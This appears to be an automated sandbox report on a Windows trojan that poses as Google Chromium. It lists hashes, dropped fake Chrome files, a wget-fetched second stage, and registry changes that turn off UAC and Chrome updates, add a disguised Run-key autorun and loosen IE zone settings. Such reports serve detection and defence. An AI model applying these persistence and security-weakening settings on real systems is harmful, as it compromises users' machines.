MD5: 8d63c59faaa793febf00d7dcdf544d1a
SHA1: 9df680b3d42da64f65c82e4983d49bac27b92204
SHA256: 485ec36f453ed9d4e99fcc8bfccb8e7e4e1cf6cf57dabd49078f53d8a514dd63
SSDeep: 12288:mNIQAPGsAqY9IMVYd38sJdpQHlGlY8KfTk3C7b/l9TXQC :7PGSY91VwNJcFMqTzbdVXl
Size: 645701 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualCv71EXE, MicrosoftVisualCv70, UPolyXv05_v6
Company: no certificate found
Created at: 2009-09-25 21:57:32
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:348
Chromium.exe:660
wget.exe:1624
arsiv.exe:208

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:348 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Chromium.exe (3860 bytes)

The process Chromium.exe:660 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ko.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fa.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ta.pak (4185 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ms.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\id.pak (1281 bytes)
%Documents and Settings%\%current user%\Application Data\key.txt (249 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fa.pak (2105 bytes)
%Documents and Settings%\%current user%\Application Data\setting (28 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\cs.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-TW.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\gu.pak (3073 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\gu.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ro.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hr.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bg.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ms.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fil.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\resources.pak (43124 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\ok.txt (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\te.pak (3361 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ta.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sk.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fi.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fr.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ml.pak (4545 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\mr.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es-419.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\vi.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\mr.pak (3073 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\am.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\libpeerconnection.dll (15116 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ru.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nb.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\uk.pak (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Preferences (73 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\de.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ar.pak (2105 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nl.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-CN.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sw.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sl.dll (10 bytes)
%System%\drivers\etc\hosts (59 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ca.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\icudt.dll (76505 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bn.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-US.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\uk.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-GB.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\el.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lt.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hi.pak (3361 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\chrome_100_percent.pak (7345 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\it.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\th.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\it.pak (1281 bytes)
%Documents and Settings%\%current user%\Desktop\Google Chrome.lnk (791 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sw.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\he.pak (1425 bytes)
%Documents and Settings%\%current user%\Application Data\wget.exe (1333 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lv.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-TW.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\th.pak (3361 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hu.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\et.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pl.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nb.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\he.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-PT.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\chrome.dll (360605 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\PepperFlash\manifest.json (2 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hr.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sr.pak (2321 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fil.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nl.pak (1281 bytes)
%Documents and Settings%\%current user%\Application Data\bg.txt (1 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pl.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-BR.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ar.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\tr.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hu.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-CN.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ja.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\da.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\am.pak (2105 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bn.pak (3361 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-GB.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\id.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es-419.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sk.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\cs.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\et.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ru.pak (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aideiobfnjdbgbcjcbbmfbpfodjapgpi\bg.txt (1 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lv.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ml.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ko.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\kn.pak (4185 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\PepperFlash\pepflashplayer.dll (113356 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ca.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-PT.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ja.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\te.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ro.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-BR.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sr.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fi.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fr.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\kn.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hi.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-US.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sv.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\tr.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\el.pak (3073 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\de.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bg.pak (2321 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\vi.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lt.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sl.pak (1281 bytes)
%Documents and Settings%\%current user%\Application Data\hash.txt (32 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\da.dll (10 bytes)
%Program Files%\Google\Chrome\Application\chrome.exe (5889 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sv.dll (9 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions (0 bytes)
%Documents and Settings%\%current user%\Application Data\wget.exe (0 bytes)
%Documents and Settings%\%current user%\Application Data\bg.txt (0 bytes)
%Documents and Settings%\%current user%\Application Data\update.txt (0 bytes)
%Documents and Settings%\%current user%\Application Data\key.txt (0 bytes)
%Documents and Settings%\%current user%\Application Data\hash.txt (0 bytes)

The process wget.exe:1624 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\arsiv.exe (4224392 bytes)

The process arsiv.exe:208 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lt.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sl.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sw.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\cs.pak (250 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es-419.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bn.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\vi.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lv.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ml.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ru.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ko.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fa.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hu.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ms.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lv.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ja.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nl.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ro.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-PT.pak (250 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ca.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fi.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\da.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\tr.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-US.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\id.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\uk.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hu.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nl.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\PepperFlash\manifest.json (2 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\libpeerconnection.dll (56491 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\da.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sl.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-GB.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ru.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ar.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\PepperFlash\pepflashplayer.dll (277843 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sk.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ro.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\et.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pl.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\gu.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\kn.pak (4074 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\gu.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hr.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sr.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fil.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sw.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sv.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\chrome.exe (30992 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\icudt.dll (455362 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\tr.pak (250 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fr.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\el.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\am.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\id.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\he.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\am.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\it.pak (250 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fr.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es-419.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\it.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\th.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bg.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\cs.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fa.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ta.pak (5049 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nb.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-BR.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ca.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sr.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\te.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bg.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ja.pak (1274 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sv.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lt.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\chrome_100_percent.pak (6625 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-GB.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\kn.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\uk.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-US.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ta.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\vi.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\mr.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-CN.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ar.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-CN.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\de.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\mr.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-TW.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\et.pak (2249 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ms.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nb.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\he.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\de.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sk.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\th.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ko.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-TW.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-BR.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\chrome.dll (794832 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-PT.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fil.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\resources.pak (40311 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hr.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pl.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ml.pak (4074 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hi.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\el.pak (3461 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fi.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bn.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\te.pak (3257 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hi.dll (10 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\__tmp_rar_sfx_access_check_296265 (0 bytes)

Registry activity

The process %original file name%.exe:348 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 23 EB 96 21 75 32 5C D3 80 CE 2E 63 5E 37 06"

The process Chromium.exe:660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA B7 E1 02 8B EC DC 2E 1C 77 3B 1B 49 FA FD 01"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Google Chromium" = "%Documents and Settings%\%current user%\Application Data\Chromium.exe"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

